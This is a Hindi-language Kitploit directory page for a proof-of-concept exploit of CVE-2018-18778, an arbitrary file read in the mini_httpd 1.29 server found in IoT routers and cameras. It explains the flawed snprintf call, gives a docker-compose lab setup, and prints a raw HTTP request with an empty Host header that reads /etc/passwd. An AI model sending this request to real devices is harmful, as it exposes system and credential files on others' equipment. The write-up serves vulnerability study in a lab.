Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Mini_httpd-CVE-2018-18778 — CVE-2018-18778 के लिए PoC शोषण: खाली Host हेडर के माध्यम से mini_httpd 1.29 में मनमानी फ़ाइल पढ़ना, जो Huawei, Zyxel, और अन्य के IoT उपकरणों को प्रभावित करता है। | Kitploit
उपकरण/GitHubGitHub/cyberharsh/mini_httpd-cve-2018-18778
एम्बेडेड सिस्टम सुरक्षाIoT सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफज़िंग
GitHubcyberharsh/mini_httpd-cve-2018-18778

Mini_httpd-CVE-2018-18778

CVE-2018-18778 के लिए PoC शोषण: खाली Host हेडर के माध्यम से mini_httpd 1.29 में मनमानी फ़ाइल पढ़ना, जो Huawei, Zyxel, और अन्य के IoT उपकरणों को प्रभावित करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
536 साल पहलेअभी तक समीक्षित नहीं

mini_httpd मनमानी फ़ाइल पढ़ने की भेद्यता (CVE-2018-18778)

Mini_httpd एक लघु HTTP सर्वर है जो सिस्टम संसाधनों का कम उपयोग करते हुए एक निश्चित स्तर का प्रदर्शन (लगभग Apache का 90%) बनाए रख सकता है, इसलिए इसका व्यापक रूप से विभिन्न IOT उपकरणों (राउटर, स्विच, कैमरा आदि) में एम्बेडेड सर्वर के रूप में उपयोग किया जाता है। Huawei, Zyxel, Hikvision, Raspberry Pi आदि निर्माताओं के उपकरणों ने mini_httpd घटक का उपयोग किया है।

mini_httpd में वर्चुअल होस्ट मोड सक्षम होने पर, उपयोगकर्ता का http://HOST/FILE अनुरोध वर्तमान निर्देशिका के अंतर्गत HOST/FILE फ़ाइल तक पहुँचेगा।

(void) snprintf( vfile, sizeof(vfile), "%s/%s", req_hostname, f );

उपरोक्त कोड देखें, विश्लेषण इस प्रकार है:

  • जब HOST=example.com और FILE=index.html हो, तो उपरोक्त कथन का परिणाम example.com/index.html होता है, फ़ाइल सामान्य रूप से पढ़ी जाती है।
  • जब HOST खाली हो और FILE=etc/passwd हो, तो उपरोक्त कथन का परिणाम /etc/passwd होता है।

बाद वाले को निरपेक्ष पथ के रूप में लिया जाता है, इस प्रकार /etc/passwd पढ़ा जाता है, जिससे मनमानी फ़ाइल पढ़ने की भेद्यता उत्पन्न होती है।

वातावरण सेटअप

mini_httpd 1.29 प्रारंभ करने के लिए निम्नलिखित कमांड चलाएँ:

docker-compose up -d

वातावरण प्रारंभ होने के बाद, http://your-ip:8080 पर जाएँ और वेब पृष्ठ देखें।

भेद्यता पुनरुत्पादन

अनुरोध भेजते समय Host को खाली रखें, PATH का मान फ़ाइल का निरपेक्ष पथ है:

GET /etc/passwd HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close


फ़ाइल सफलतापूर्वक पढ़ी गई:

टूल डाउनलोड करें